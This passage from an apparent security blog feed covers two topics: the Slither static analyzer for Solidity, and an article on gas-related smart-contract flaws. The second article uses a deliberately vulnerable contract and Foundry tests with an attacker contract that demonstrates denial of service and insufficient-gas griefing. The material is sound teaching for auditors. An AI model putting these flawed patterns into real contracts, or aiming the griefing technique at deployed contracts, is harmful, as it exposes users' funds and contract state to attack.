This transformation is where Slither really differentiates itself from basic linting tools. SlithIR uses **Static Single Assignment (SSA)** form - a representation where each variable is defined exactly once. This is invaluable because it allows precise tracking of:

-   **Data flow paths** - showing exactly how user input can propagate to sensitive operations
-   **State modifications** - revealing where contract storage gets altered
-   **Cross-function dependencies** - exposing how one vulnerable function might compromise others

The SSA form makes it significantly easier to detect subtle vulnerability patterns like reentrancy, where the sequence of state updates and external calls becomes critical.
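
The renaming at the heart of SSA can be sketched in a few lines of Python (a toy model for intuition only; SlithIR's real SSA also handles branches with phi nodes, which this ignores): every write to a variable mints a fresh version, so every later read names exactly one definition.

```python
from collections import defaultdict

def to_ssa(statements):
    """Rename variables so each is assigned exactly once (toy SSA).

    `statements` are (target, reads) pairs, where `reads` lists the
    variables consumed on the right-hand side.
    """
    version = defaultdict(int)
    ssa = []
    for target, reads in statements:
        # Reads refer to the current (latest) version of each variable.
        read_names = [f"{v}_{version[v]}" for v in reads]
        # The write creates a brand-new version of the target.
        version[target] += 1
        ssa.append((f"{target}_{version[target]}", read_names))
    return ssa

# x = input(); x = x + y; z = x
program = [("x", []), ("x", ["x", "y"]), ("z", ["x"])]
print(to_ssa(program))
# [('x_1', []), ('x_2', ['x_1', 'y_0']), ('z_1', ['x_2'])]
```

Because `x_2` names exactly one definition, asking "where did this value come from" becomes a lookup rather than a search, which is what makes data-flow queries cheap.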

### **Phase 3: Executing Specialized Detectors**

Armed with this highly structured representation, Slither unleashes its arsenal of **specialized vulnerability detectors** - each designed to identify specific attack vectors:

-   **Taint analysis** systematically traces user-controlled input through the application flow, flagging when it reaches sensitive operations like `selfdestruct` or `delegatecall`
-   **Storage access pattern analysis** identifies dangerous sequences like &quot;read, external call, write&quot; that often indicate reentrancy vulnerabilities
-   **Authorization analysis** maps which addresses or roles can access which functions, exposing privilege issues

These detectors use graph-based algorithms to identify vulnerability patterns across the entire codebase, not just within individual functions or contracts.
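
At its core, the taint-analysis detector family answers a reachability question, sketched here in Python (a hand-rolled toy for intuition, not how Slither's detectors are actually written; the variable names are illustrative): mark user-controlled sources, propagate through assignments to a fixed point, and report any sink they reach.

```python
def tainted_sinks(assignments, sources, sinks):
    """Propagate taint through (target, operands) assignments and
    return the sinks reachable from user-controlled sources."""
    tainted = set(sources)
    changed = True
    while changed:  # iterate until no new variable becomes tainted
        changed = False
        for target, operands in assignments:
            if target not in tainted and tainted.intersection(operands):
                tainted.add(target)
                changed = True
    return tainted.intersection(sinks)

# msg.data flows into dest, which reaches delegatecall's argument.
flow = [("amount", ["msg.value"]),
        ("dest", ["msg.data"]),
        ("delegatecall_target", ["dest"])]
print(tainted_sinks(flow, sources={"msg.data"}, sinks={"delegatecall_target"}))
# prints {'delegatecall_target'}
```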

# Installation and First Steps

Setting up Slither properly is your first engagement in the smart contract security battlefield. As a penetration tester, you need reliable tools that integrate seamlessly into your workflow without becoming a distraction. Here&apos;s how to get your Slither environment battle-ready.

### The Arsenal: Prerequisites

Before deploying Slither, ensure your penetration testing environment has these essentials:

-   **Python 3.6+** - The runtime environment that powers Slither
-   **pip3** - Your package acquisition system
-   **Solidity compiler** - Ideally with multiple versions available for testing against different compiler targets

For serious contract pentesting, I strongly recommend having multiple Solidity compiler versions accessible. Different projects compile with different versions, and compiler-specific bugs can sometimes be part of your attack vector. Check your current `solc` setup with:

```bash
solc --version

```

If you need to manage multiple compiler versions (and trust me, you will), install `solc-select`:

```bash
pip3 install solc-select

```

&lt;details&gt;
&lt;summary&gt;This gives you the ability to switch compiler versions on demand:&lt;/summary&gt;

```bash
solc-select install 0.8.17
solc-select use 0.8.17

```
&lt;/details&gt;


### Deploying Slither

Now for Slither itself. Installation is straightforward, but pay attention to the output for any dependency warnings:

```bash
pip3 install slither-analyzer

```

&lt;details&gt;
&lt;summary&gt;Verify your deployment with:&lt;/summary&gt;

```bash
slither --version

```
&lt;/details&gt;


Pro tip: If you&apos;re using Slither frequently across different client engagements, consider creating a dedicated virtual environment to avoid tool conflicts:

```bash
python3 -m venv slither-env
source slither-env/bin/activate
pip3 install slither-analyzer

```

This isolation approach ensures your reconnaissance tooling remains stable regardless of other Python packages installed on your system.

### Analyzing Your First Contract

Let’s analyze the contract we developed in [entry #16](https://www.kayssel.com/post/web3-16/) of this series, where we explored gas-related issues in Web3. You can run Slither on it with a simple command like:

```bash
slither src/contract.sol

```

![](/content/images/2025/03/image-12.png)

Running Slither for the first time

Once executed, Slither will output a detailed report directly in your terminal. Running it on our gas-focused contract, for instance, reveals potential reentrancy issues and unsafe external calls.

Here’s what Slither provides out of the box:

-   **Detected vulnerabilities**  
    Reentrancy, shadowed variables, missing zero-address checks, and more.
-   **Contract structure and inheritance**  
    Including function relationships, modifier usage, and visibility.
-   **Storage access patterns**  
    For example, state variables modified after external calls — a common source of bugs.
-   **Gas optimization tips**  
    Such as identifying variables that could be marked as `constant` or `immutable`.

Even on a relatively simple contract, Slither surfaces a surprising amount of insight. The more complex the logic, the more valuable its output becomes — especially when used early in development or during security reviews.

# Practice Example

Let&apos;s examine a practical application of Slither against our target contract from last week. While Slither offers numerous advanced options, I&apos;ll demonstrate the reconnaissance approaches that consistently deliver the highest value intelligence during my own contract penetration tests.

First, I&apos;ll deploy Slither for an initial vulnerability scan:

```bash
slither . 

```

This baseline scan reveals potential exploitation paths ranked by severity – from critical issues that warrant immediate attention to informational findings that might contribute to chained attacks.

Beyond this standard reconnaissance, I leverage two specialized intelligence-gathering commands:

```bash
slither . --print contract-summary

```

![](/content/images/2025/04/image-1.png)

Basic recon

This generates a rapid overview of the target&apos;s capabilities and structure – similar to mapping a facility&apos;s floor plan before launching a physical penetration test.

Next, I map the permission structure to identify access control weaknesses:

```bash
slither . --print vars-and-auth

```

![](/content/images/2025/04/image.png)

Auth recon

This shows me the permission structure - which functions can modify which variables, and who has access to what.

While command line tools are powerful, most of us work in code editors day-to-day. If you&apos;re using Visual Studio Code like me, there are two extensions that will absolutely transform your auditing experience:

-   Solidity Visual Developer
-   Slither

Once you&apos;ve installed these, open your project and click the &quot;play&quot; button in the Slither extension panel. After a few seconds, you&apos;ll see all potential vulnerabilities displayed in a much more digestible format than the command line output.

What&apos;s really cool is that you can click on any finding and VS Code will instantly jump to the exact line of code where Slither detected an issue. No more hunting through files!

![](/content/images/2025/04/image-7.png)

Slither in vscode

![](/content/images/2025/04/image-3.png)

Jumping to the function

The Solidity Visual Developer extension lets you create audit annotations right in your code using the `@audit` keyword. For example:

![](/content/images/2025/04/image-8.png)

Using notation

This makes it incredibly easy to collect all your findings when it&apos;s time to write up that final report, especially when you&apos;re reviewing thousands of lines of code across multiple contracts.

One of my favorite features is the ability to generate interactive graphs that visualize contract structures and relationships. While our example is just a small contract, this becomes invaluable when dealing with complex systems.

You can see function call graphs, inheritance patterns, and storage access paths - all as interactive diagrams you can click through. It&apos;s like having a map of the codebase that shows not just what exists, but how everything connects.

![](/content/images/2025/04/image-5.png)

Graph representation

The extension offers several different visualization options, from straightforward inheritance trees to complex call graphs that show exactly how data flows through the system.

![](/content/images/2025/04/image-6.png)

Different ways to represent information

# Conclusions: Slithering Towards Web3 Security

And that&apos;s where we&apos;ll wrap up our introduction to Slither! As you can see, having a snake in your security toolkit isn&apos;t always a bad idea (unless you&apos;re in a Samuel L. Jackson movie, of course).

We&apos;ve seen how Slither can become your best ally in detecting vulnerabilities before hackers find them and decide your smart contract is the ATM of the month. From static analysis to visualizations that would make a graphic designer weep, this tool has everything you need to sleep a little more soundly at night.

I&apos;m leaving the article here because, honestly, it was getting a bit long (and I don&apos;t want you needing extra coffee to finish reading it). Plus, my keyboard was starting to smoke and I don&apos;t have the budget for a new one this month.

In the next article, we&apos;ll dive into Slither&apos;s API and see how we can program with it to create our own custom detectors. Because, let&apos;s be honest, what&apos;s more fun than writing code to analyze code? It&apos;s like that scene from Inception, but with less Leonardo DiCaprio and more blockchain security.

Until then, keep your contracts clean and your variables initialized. Web3 security will thank you, and so will your digital wallet.

# References

-   Trail of Bits. &quot;Slither Documentation: A Solidity Static Analysis Framework.&quot; Available at: [https://github.com/crytic/slither/wiki](https://github.com/crytic/slither/wiki)
-   Juan Blanco. &quot;Solidity Visual Developer Extension for VS Code.&quot; Available at: [https://marketplace.visualstudio.com/items?itemName=JuanBlanco.solidity](https://marketplace.visualstudio.com/items?itemName=JuanBlanco.solidity)
-   Trail of Bits. &quot;Slither VS Code Extension.&quot; Available at: [https://marketplace.visualstudio.com/items?itemName=trailofbits.slither-vscode](https://marketplace.visualstudio.com/items?itemName=trailofbits.slither-vscode)
-   Feist, J., Grieco, G., &amp; Groce, A. &quot;Slither: A Static Analysis Framework For Smart Contracts.&quot; In 2019 IEEE/ACM 2nd International Workshop on Emerging Trends in Software Engineering for Blockchain (WETSEB), 2019, 8–15. Available at: [https://ieeexplore.ieee.org/document/8823898](https://ieeexplore.ieee.org/document/8823898)
-   Ghaleb, A., &amp; Pattabiraman, K. &quot;How effective are smart contracts analysis tools?&quot; In Proceedings of the 29th ACM SIGSOFT International Symposium on Software Testing and Analysis (ISSTA ’20), 2020, Virtual Event, USA, 11 pages. Available at: [https://doi.org/10.1145/3395363.3397385](https://dl.acm.org/doi/10.1145/3395363.3397385)</content:encoded><author>Ruben Santos</author></item><item><title>Fuel for the Ritual: Gas Mechanics and Misfires in Web3</title><link>https://www.kayssel.com/post/web3-16</link><guid isPermaLink="true">https://www.kayssel.com/post/web3-16</guid><description>Learn how poor gas management can break smart contracts, open attack vectors, and waste resources. We explore real examples, test cases, and practical tips to help you audit and optimize gas usage like a pro—without burning your mana.</description><pubDate>Sun, 30 Mar 2025 14:57:41 GMT</pubDate><content:encoded># Let’s Talk Gas (No, Not That Kind)

If you’ve ever tried deploying a smart contract and thought, _“Why is this thing costing me more than my last flight?”_ — welcome to the wonderful world of **gas** in Web3.

Gas isn’t just something that clogs your nose after too many beans. In Ethereum and other EVM-based blockchains, gas is the fuel that powers every interaction—from simple ETH transfers to complex DeFi spells. And just like in the real world, if you’re not careful, you can burn through a lot of it fast.

But here’s the twist: gas doesn’t just affect your wallet—it can break your contracts, open up attack vectors, and cause silent logic failures that are hard to detect and even harder to debug.

In this post, I&apos;m going to explore what gas really is, how it can be abused, and how to make your contracts leaner, safer, and way less embarrassing on-chain. Bring your grimoire, and let’s get started.

# **What is Gas in Web3?**

If you’ve ever interacted with Ethereum or any other EVM (Ethereum Virtual Machine)-based blockchain, you’ve probably come across the term &quot;gas.&quot;

And let’s be honest, the first time you saw it, you probably thought:

What exactly is gas, and why do I have to pay for it?

Well, simply put, gas is the fuel that powers the blockchain. Every time you execute a transaction—whether it&apos;s sending ETH, minting an NFT, or interacting with a smart contract—you’re asking the network to perform computations on your behalf. And, of course, that work isn’t free.

Imagine the blockchain as a highway and transactions as cars. To drive on this highway, you need fuel (gas). If you want to get to your destination faster, you can pay more gas to move ahead. But if there’s a traffic jam (network congestion), gas prices spike because everyone is trying to move at the same time.

So in summary:

-   Gas = The computational energy required to execute blockchain transactions.
-   It’s paid in ETH (or the blockchain’s native token).
-   The more complex the transaction, the more gas it consumes.

## **How is Gas Calculated in Ethereum?**

Gas is measured in **gas units**, and every Solidity operation has a specific gas cost. The basic formula is:

```
Total Gas Cost = Gas Units Used × Gas Price (in gwei)

```

-   Sending ETH from one address to another costs 21,000 gas.
-   Executing a function in a smart contract could cost 50,000 gas or more.
-   If the gas price is 30 gwei, sending ETH would cost:

```
21,000 gas × 30 gwei = 630,000 gwei = 0.00063 ETH

```
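
The same arithmetic as a quick sanity check in Python (1 gwei = 10⁻⁹ ETH):

```python
GWEI_PER_ETH = 10**9

def tx_cost_eth(gas_units: int, gas_price_gwei: int) -> float:
    """Total fee = gas units consumed x gas price, converted to ETH."""
    return gas_units * gas_price_gwei / GWEI_PER_ETH

# A plain ETH transfer at 30 gwei:
print(tx_cost_eth(21_000, 30))  # 0.00063
```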

When signing a transaction, you can adjust the gas price:

-   If you pay more gas, your transaction gets confirmed faster.
-   If you pay less gas, it may take longer or even get stuck.

# Understanding the Contract

Before diving into vulnerabilities or test cases, it’s important to understand how this contract works. Think of it as a digital grimoire—each function is a spell, each variable a channel of stored energy, and every interaction triggers a small piece of executable magic.

This setup includes two contracts: **GrimoireOfEchoes**, which acts as the main contract, and **OracleOfWhispers**, an external component used to record specific actions. Let’s walk through each part of the system.

&lt;details&gt;
&lt;summary&gt;Smart Contract Code&lt;/summary&gt;

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;
import &quot;forge-std/console.sol&quot;;

contract GrimoireOfEchoes {
    mapping(address =&gt; uint256) public manaReservoir;
    uint256 public corruptionIndex;
    uint256 public forbiddenTithe;
    address public oracle;
    event SpellBackfired(address target, bytes incantation);

    constructor(address _oracle) {
        oracle = _oracle;
        forbiddenTithe = 100;
    }

    function channelMana() public payable {
        manaReservoir[msg.sender] += msg.value;
    }

    function releaseEssence() public {
        uint256 essence = manaReservoir[msg.sender];
        require(essence &gt; 0, &quot;No essence bound&quot;);

        (bool success, ) = payable(msg.sender).call{gas: 2300, value: essence}(&quot;&quot;);
        require(success, &quot;Ritual disrupted&quot;);

        manaReservoir[msg.sender] = 0;
    }

    function amplifySpirits(address[] calldata spirits) public {
        for (uint256 i = 0; i &lt; spirits.length; i++) {
            manaReservoir[spirits[i]] = manaReservoir[spirits[i]] * 2;
        }
    }

    function invokeOracle() public {
        require(msg.sender != tx.origin, &quot;Only summoned entities may invoke&quot;);

        corruptionIndex += 1;
        (bool success, ) = oracle.call(
            abi.encodeWithSignature(&quot;recordInvocation()&quot;)
        );

        if (success) {
            corruptionIndex -= 1;
        }
    }
}

contract OracleOfWhispers {
    mapping(address =&gt; bool) public invoked;
    event InvocationRecorded(address caller);

    function recordInvocation() external {
        require(!invoked[msg.sender], &quot;Already invoked&quot;);

        invoked[msg.sender] = true;
        emit InvocationRecorded(msg.sender);
    }
}


```
&lt;/details&gt;


#### State Variables

-   `mapping(address =&gt; uint256) public manaReservoir;`  
    This mapping tracks the &quot;mana&quot; (ETH) each user has deposited into the contract.
-   `uint256 public forbiddenTithe;`  
    A fixed fee, set to 100 in the constructor, although it’s not currently used. Consider it a placeholder for a future arcane tax.
-   `uint256 public corruptionIndex;`  
    A counter that tracks how many times someone has attempted to invoke the oracle. Think of it as a log of attempted invocations.
-   `address public oracle;`  
    This holds the address of the external `OracleOfWhispers` contract, which is called during specific actions.
-   `event SpellBackfired(address target, bytes incantation);`  
    An event meant to signal failed external calls, although it’s not emitted in the current implementation.

### Constructor

```solidity
constructor(address _oracle) {
    oracle = _oracle;
    forbiddenTithe = 100;
}

```

When the contract is deployed, it requires the address of the oracle contract. This establishes a fixed link between the two, allowing the main contract to call the oracle later on.

### channelMana

```solidity
function channelMana() public payable {
    manaReservoir[msg.sender] += msg.value;
}

```

This function allows users to send ETH to the contract, increasing their mana balance. It’s a simple deposit mechanism, storing value under their address.

### releaseEssence()

```solidity
function releaseEssence() public {
    uint256 essence = manaReservoir[msg.sender];
    require(essence &gt; 0, &quot;No essence bound&quot;);

    (bool success, ) = payable(msg.sender).call{gas: 2300, value: essence}(&quot;&quot;);
    require(success, &quot;Ritual disrupted&quot;);

    manaReservoir[msg.sender] = 0;
}

```

This function lets users withdraw the ETH they’ve deposited. It attempts to send the exact amount back to the caller using a low-gas `call`, and if it succeeds, their balance is reset to zero. If the call fails, the entire transaction is reverted.

### amplifySpirits

```solidity
function amplifySpirits(address[] calldata spirits) public {
    for (uint256 i = 0; i &lt; spirits.length; i++) {
        manaReservoir[spirits[i]] = manaReservoir[spirits[i]] * 2;
    }
}

```

This function doubles the mana of each address passed into it. It’s a kind of collective buff—a spell that amplifies the stored ETH of multiple users at once.

### invokeOracle()

```solidity
function invokeOracle() public {
    require(msg.sender != tx.origin, &quot;Only summoned entities may invoke&quot;);

    corruptionIndex += 1;
    (bool success, ) = oracle.call(
        abi.encodeWithSignature(&quot;recordInvocation()&quot;)
    );

    if (success) {
        corruptionIndex -= 1;
    }
}

```

This function can only be called by other contracts (not externally owned accounts). When invoked, it increases the corruption counter and calls `recordInvocation()` on the external oracle. If the call is successful, it rolls back the counter. If not, the corruption remains—a trace of a failed ritual.

### OracleOfWhispers – The Invocation Registry

This contract records whether an address has performed a certain action. It acts like a magical ledger that tracks who has summoned it.

#### State

-   `mapping(address =&gt; bool) public invoked;`  
    This mapping marks whether an address has successfully recorded an invocation.

### recordInvocation

```solidity
function recordInvocation() external {
    require(!invoked[msg.sender], &quot;Already invoked&quot;);

    invoked[msg.sender] = true;
    emit InvocationRecorded(msg.sender);
}

```

Only callable once per address, this function records that the caller has performed an invocation and emits an event. It’s a lightweight registry of who has interacted with the oracle.

# Understanding Each Vulnerability Through Test Cases

Now that we understand how the GrimoireOfEchoes and the OracleOfWhispers work, it&apos;s time to examine the flaws in their logic. Each of the following vulnerabilities represents a common class of issues in smart contracts, particularly those related to gas usage. Alongside each explanation, we reference a test case that demonstrates how these flaws behave in practice.

&lt;details&gt;
&lt;summary&gt;Test Case&lt;/summary&gt;

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

import &quot;forge-std/Test.sol&quot;;
import &quot;../src/VulnerableContract.sol&quot;;

contract GrimoireTest is Test {
    GrimoireOfEchoes grimoire;
    OracleOfWhispers oracle;
    ArcaneInvoker attacker;

    address user = address(0x123);
    address[] spirits = new address[](100);
    address payable essenceBearer = payable(address(0x456));

    function setUp() public {
        oracle = new OracleOfWhispers();
        grimoire = new GrimoireOfEchoes(address(oracle));
        attacker = new ArcaneInvoker();
    }

    function testEssenceReleaseFailsForContractReceiver() public {
        vm.deal(address(attacker), 10 ether);
        vm.deal(address(grimoire), 10 ether);

        attacker.channelManaToGrimoire{value: 1 ether}(payable(address(grimoire)));

        vm.expectRevert();
        attacker.releaseEssenceFromGrimoire(address(grimoire));
    }

    function testAmplifyFailsDueToBlockGasLimit() public {
        vm.deal(address(grimoire), 10 ether);
        for (uint256 i = 0; i &lt; spirits.length; i++) {
            spirits[i] = address(uint160(i + 1));
        }

        vm.expectRevert();
        grimoire.amplifySpirits(spirits);
    }

    function testInsufficientGasInvocation() public {
        vm.deal(address(grimoire), 10 ether);

        attacker.performGriefingInvocation(address(grimoire));

        uint256 index = grimoire.corruptionIndex();
        console.log(&quot;Corruption index after failed invocation:&quot;, index);
        assertEq(index, 1);
    }
}
contract ArcaneInvoker {
    receive() external payable {
        uint256 entropy;
        for (uint256 i = 0; i &lt; 10000; i++) {
            entropy += i;
        }
        console.log(&quot;Remaining mana (gas): %s&quot;, gasleft());
    }

    function channelManaToGrimoire(address payable grimoireAddress) public payable {
        GrimoireOfEchoes(grimoireAddress).channelMana{value: msg.value}();
    }

    function releaseEssenceFromGrimoire(address grimoireAddress) public {
        GrimoireOfEchoes(grimoireAddress).releaseEssence();
    }

    function performGriefingInvocation(address grimoireAddress) public {
        bytes memory incantation = abi.encodeWithSignature(&quot;invokeOracle()&quot;);
        grimoireAddress.call{gas: 50000}(incantation);
    }
}

```
&lt;/details&gt;


## Low-Gas Transfer to Contracts

**Vulnerability**: Using a fixed gas stipend (2300 gas) to send ETH prevents contract receivers from executing code in their fallback or receive functions, potentially causing the transfer to fail.

In `releaseEssence()`, the Grimoire attempts to send ETH back to the caller using:

```solidity
(bool success, ) = payable(msg.sender).call{gas: 2300, value: essence}(&quot;&quot;);

```

This pattern was historically recommended to prevent reentrancy attacks, as 2300 gas is only enough to emit an event or write to storage. However, if the recipient is a contract with any logic in its `receive()` function—even a small loop—it will require more than 2300 gas, and the call will fail.

In `testEssenceReleaseFailsForContractReceiver()`, the attacker deposits ETH into the Grimoire, then tries to withdraw it. However, the attacker&apos;s contract includes a `receive()` function with a gas-consuming loop, which causes the withdrawal to fail due to the insufficient gas provided by the fixed 2300 stipend.

```solidity
function testEssenceReleaseFailsForContractReceiver() public {
        vm.deal(address(attacker), 10 ether);
        vm.deal(address(grimoire), 10 ether);

        attacker.channelManaToGrimoire{value: 1 ether}(payable(address(grimoire)));

        vm.expectRevert();
        attacker.releaseEssenceFromGrimoire(address(grimoire));
    }

```

```solidity
receive() external payable {
        uint256 entropy;
        for (uint256 i = 0; i &lt; 10000; i++) {
            entropy += i;
        }
        console.log(&quot;Remaining mana (gas): %s&quot;, gasleft());
    }

```

![](/content/images/2025/03/image-7.png)

Revert - out of gas

As shown in the trace output in the image above, the test confirms the revert due to an `OutOfGas` error in the `receive()` function, and the revert message matches the expected failure path in `releaseEssence()`.

## Denial of Service via Block Gas Limit

**Vulnerability**: Functions that perform unbounded loops over user-controlled data risk exceeding the block gas limit, rendering them unusable and opening the door to denial-of-service attacks.

The function `amplifySpirits()` doubles the mana of each address in the input array:

```solidity
for (uint256 i = 0; i &lt; spirits.length; i++) {
    manaReservoir[spirits[i]] *= 2;
}

```

There is no input validation or limit on the array length. If the array is too large, the gas cost of the loop will exceed the block gas limit, and the transaction will revert.
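
A back-of-the-envelope estimate in Python shows how low the ceiling is. The numbers are illustrative assumptions, not measured values: roughly 5,000 gas per rewrite of an already-nonzero storage slot, and a 30M block gas limit. Both vary with network rules and slot state (a zero-to-nonzero write costs far more).

```python
# Approximate cost model -- real costs depend on EIP-2929 warm/cold
# access and on whether the slot goes from zero to nonzero.
SSTORE_UPDATE_GAS = 5_000     # assumed cost to rewrite a nonzero slot
BLOCK_GAS_LIMIT = 30_000_000  # a common mainnet ceiling

max_iterations = BLOCK_GAS_LIMIT // SSTORE_UPDATE_GAS
print(max_iterations)  # 6000
```

So even under generous assumptions, a few thousand entries is enough to make `amplifySpirits()` uncallable, ignoring every other cost in the transaction.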

In `testAmplifyFailsDueToBlockGasLimit()`, we attempt to simulate this by generating a large array of addresses and passing it to `amplifySpirits()`. However, in practice, the failure occurs **before the function is even called**—specifically during this line:

```solidity
spirits[i] = address(uint160(i + 1));

```

```solidity
function testAmplifyFailsDueToBlockGasLimit() public {
        vm.deal(address(grimoire), 10 ether);
        for (uint256 i = 0; i &lt; spirits.length; i++) {
            spirits[i] = address(uint160(i + 1));
        }

        vm.expectRevert();
        grimoire.amplifySpirits(spirits);
    }

```

![](/content/images/2025/03/image-11.png)

Out of gas because spirit&apos;s map

The act of populating the array with 100,000 addresses consumes so much gas that the test reverts before reaching the contract call (the snippet above declares only 100 entries, the trimmed size used later for the gas report). Determining the exact value of `i` that would push it over the edge is non-trivial, as it depends on block limits, memory usage, and environment configuration.

Still, the point stands: functions that rely on unbounded loops over user input are fragile and can easily break under realistic conditions. Whether the gas runs out during input preparation or contract execution, the root issue is the same—a lack of bounds or batching in logic that scales with user data.

As seen in the gas report image below, the `testAmplifyFailsDueToBlockGasLimit()` appears to **pass**, but this is only because the test was modified to do so. Specifically, the `vm.expectRevert()` was removed, and the number of addresses in the input array was reduced to 100. This allows the test to complete successfully, making it possible to extract a meaningful gas estimate using `forge test --gas-report`.

![](/content/images/2025/03/image-10.png)

Gas report

While this version no longer triggers an actual `OutOfGas` error, it still serves an important purpose: it shows **how expensive the function is even with relatively few entries**. The gas report reveals that `amplifySpirits()` consumes over 326,000 gas in this small-scale scenario—making it clear how quickly the function becomes unsustainable as the dataset grows.

## Insufficient Gas Griefing

**Vulnerability**: Failing to check the result of a low-level call allows an attacker to provide insufficient gas to an external call, causing it to fail silently while the contract continues execution under the false assumption that everything succeeded.

The `invokeOracle()` function includes the following logic:

```solidity
(bool success, ) = oracle.call(
    abi.encodeWithSignature(&quot;recordInvocation()&quot;)
);

if (success) {
    corruptionIndex -= 1;
}

```

If the call to the oracle fails (for example, due to insufficient gas), `success` will be `false`. However, the function does not revert or perform any other validation—it simply skips the rollback of the `corruptionIndex`, which was incremented earlier in the function.

In `testInsufficientGasInvocation()`, the attacker calls `invokeOracle()` with only 50,000 gas—enough to reach the external call, but not enough for `recordInvocation()` to complete. The oracle’s function includes a state write, which fails due to low gas. The call fails silently, but the `corruptionIndex` remains incremented.

```solidity
function testInsufficientGasInvocation() public {
        vm.deal(address(grimoire), 10 ether);

        attacker.performGriefingInvocation(address(grimoire));

        uint256 index = grimoire.corruptionIndex();
        console.log(&quot;Corruption index after failed invocation:&quot;, index);
        assertEq(index, 1);
    }

```

```solidity
function performGriefingInvocation(address grimoireAddress) public {
        bytes memory incantation = abi.encodeWithSignature(&quot;invokeOracle()&quot;);
        grimoireAddress.call{gas: 50000}(incantation);
    }

```

![](/content/images/2025/03/image-9.png)

Test trace

In this test, `corruptionIndex` is used as a simple counter to demonstrate the issue. But in real-world systems, this could easily be something more critical: a nonce for a replay-protected signature, a counter in a DAO voting module, or a usage flag in a multisig wallet. Any of these could be permanently desynchronized by the same technique.

This is my favorite gas-related vulnerability in Web3 because it exposes how gas is not just a cost—it&apos;s a constraint. If developers don’t treat gas failures as first-class failures, attackers will use that gap to corrupt contract logic.
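
The lever the attacker is pulling here is EIP-150's "all but one 64th" rule: a CALL can forward at most 63/64 of the gas remaining at the call site, and the reserved 1/64 is what lets `invokeOracle()` keep executing after the inner call dies. A quick sketch of the arithmetic (the 40,000 figure is illustrative, not a measured value from this test):

```python
def max_forwarded(gas_remaining: int) -> int:
    """EIP-150: at most all-but-one-64th of remaining gas is forwarded."""
    return gas_remaining - gas_remaining // 64

# Suppose ~40,000 gas remains when invokeOracle() reaches oracle.call(...):
remaining = 40_000
print(max_forwarded(remaining))  # 39375
```

The attacker tunes the outer gas limit so that this forwarded slice is just below what `recordInvocation()` needs, while the retained remainder is enough for the caller to finish.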

# Practical Tips for Writing Gas-Efficient Smart Contracts

As pentesters, our job goes beyond finding vulnerabilities—we’re also expected to provide **actionable insights** that help teams harden and optimize their contracts. Gas usage is one of the most overlooked areas in early-stage smart contract development, and inefficient code can quickly become a bottleneck in production.

During an audit, it&apos;s worth paying attention to patterns or decisions that increase gas costs unnecessarily. Recommending improvements in gas efficiency not only helps your client reduce user costs—it can also **prevent logic failures** under heavy load, and improve the scalability and long-term maintainability of the protocol.

Below is a collection of things you should look for when reviewing contracts, along with best practices that you can suggest to clients during or after the audit. Many of them apply directly to the GrimoireOfEchoes example we&apos;ve seen.

## Minimize Storage Writes

Storage operations are among the most expensive things you can do on-chain. Every time you update a `mapping`, assign a new value to a `uint`, or change the state of a contract variable, you’re writing to persistent storage—which costs significantly more gas than reading from it.  
Avoid unnecessary writes. For instance, don’t overwrite a value if it hasn’t changed, and don’t reset a variable unless you absolutely need to.

&lt;details&gt;
&lt;summary&gt;Instead of blindly writing:&lt;/summary&gt;

```solidity
manaReservoir[msg.sender] = 0;

```
&lt;/details&gt;


Check if it’s already zero, or skip the write under certain conditions. These savings accumulate fast in high-traffic contracts.

## Use constant and immutable Whenever Possible

If a variable doesn’t change after deployment, mark it as `constant` or `immutable`. This tells the compiler that the value is fixed, allowing it to pack and optimize the bytecode accordingly.

-   `constant` is for values known at compile time (e.g., a fee rate).
-   `immutable` is for values set once in the constructor (e.g., an oracle address).

  
Reading from `constant` or `immutable` variables is **cheaper** than accessing standard storage variables.

```solidity
uint256 public constant forbiddenTithe = 100;

```

Much better than a normal state variable when the value never changes.
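For completeness, the `immutable` counterpart looks like this (mirroring the `oracle` variable used in the refactored contract later in this article):

```solidity
address public immutable oracle; // set once, then read from bytecode instead of storage

constructor(address _oracle) {
    oracle = _oracle;
}
```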

## Avoid Unbounded Loops

We covered this earlier in the context of vulnerabilities, but it’s worth repeating as a general best practice. Unbounded `for` loops over user-controlled arrays are dangerous—not just for DoS potential, but also because they consume a **lot** of gas quickly.

**What to do instead:**

-   Enforce a maximum input length.
-   Process data in **batches** or over multiple transactions.
-   Use events for logging rather than updating storage inside the loop, when possible.
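Applied to the `amplifySpirits` function from the example, the first mitigation might look like this sketch (`MAX_BATCH` is an illustrative value, not part of the original contract):

```solidity
uint256 public constant MAX_BATCH = 50; // hypothetical upper bound

function amplifySpirits(address[] calldata spirits) external {
    uint256 len = spirits.length;
    require(len &lt;= MAX_BATCH, &quot;Batch too large&quot;); // bound the input
    for (uint256 i = 0; i &lt; len; ) {
        manaReservoir[spirits[i]] *= 2;
        unchecked { i++; }
    }
}
```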

## Use `view` and `pure` Modifiers Appropriately

Functions that don’t modify state should be explicitly marked with `view` (reads state without modifying it) or `pure` (neither reads nor modifies state). This isn’t just about semantics—it affects how the function is used.

Calling a `view` or `pure` function from off-chain (e.g., a frontend or script) doesn’t cost gas. But if the function isn’t marked, it might appear to require a transaction when it doesn’t.

```solidity
function checkMana(address user) external view returns (uint256) {
    return manaReservoir[user];
}

```

## Pack Storage Variables When Possible

Solidity stores data in 32-byte slots. If you declare multiple variables of smaller types (e.g., `uint8`, `bool`, `address`) together, they can often fit in a single slot, reducing gas costs.  
Proper packing reduces the number of storage slots used, which means cheaper writes and cheaper deployments.
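A small illustration with hypothetical field names — declaration order matters, because the compiler only packs adjacent variables into the same slot:

```solidity
// Packed: 20 + 1 + 8 + 1 = 30 bytes, fits in one 32-byte slot.
address owner;     // 20 bytes
bool    active;    //  1 byte
uint64  expiresAt; //  8 bytes
uint8   tier;      //  1 byte

// Declaring a uint256 between any of these fields would break the
// packing and push the smaller variables into additional slots.
```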

## Favor uint256 for Math Over Smaller Types

This one’s a bit counterintuitive: while `uint8` or `uint16` may seem smaller and more efficient, using `uint256` in most cases is better—especially in the EVM, which is natively 256-bit. Smaller types often require extra conversion logic (type casting) or padding, which **increases** gas costs in many operations.
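A short sketch of the difference (both loops compute the same sum; the `uint8` version forces the compiler to emit extra truncation/masking work on each iteration):

```solidity
uint256 total;

// Smaller-than-word counter: implicit masking overhead per iteration.
for (uint8 i = 0; i &lt; 100; i++) { total += i; }

// Word-sized counter: matches the EVM&apos;s native 256-bit width.
for (uint256 j = 0; j &lt; 100; j++) { total += j; }
```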

## Don’t Overuse Events for Internal State Tracking

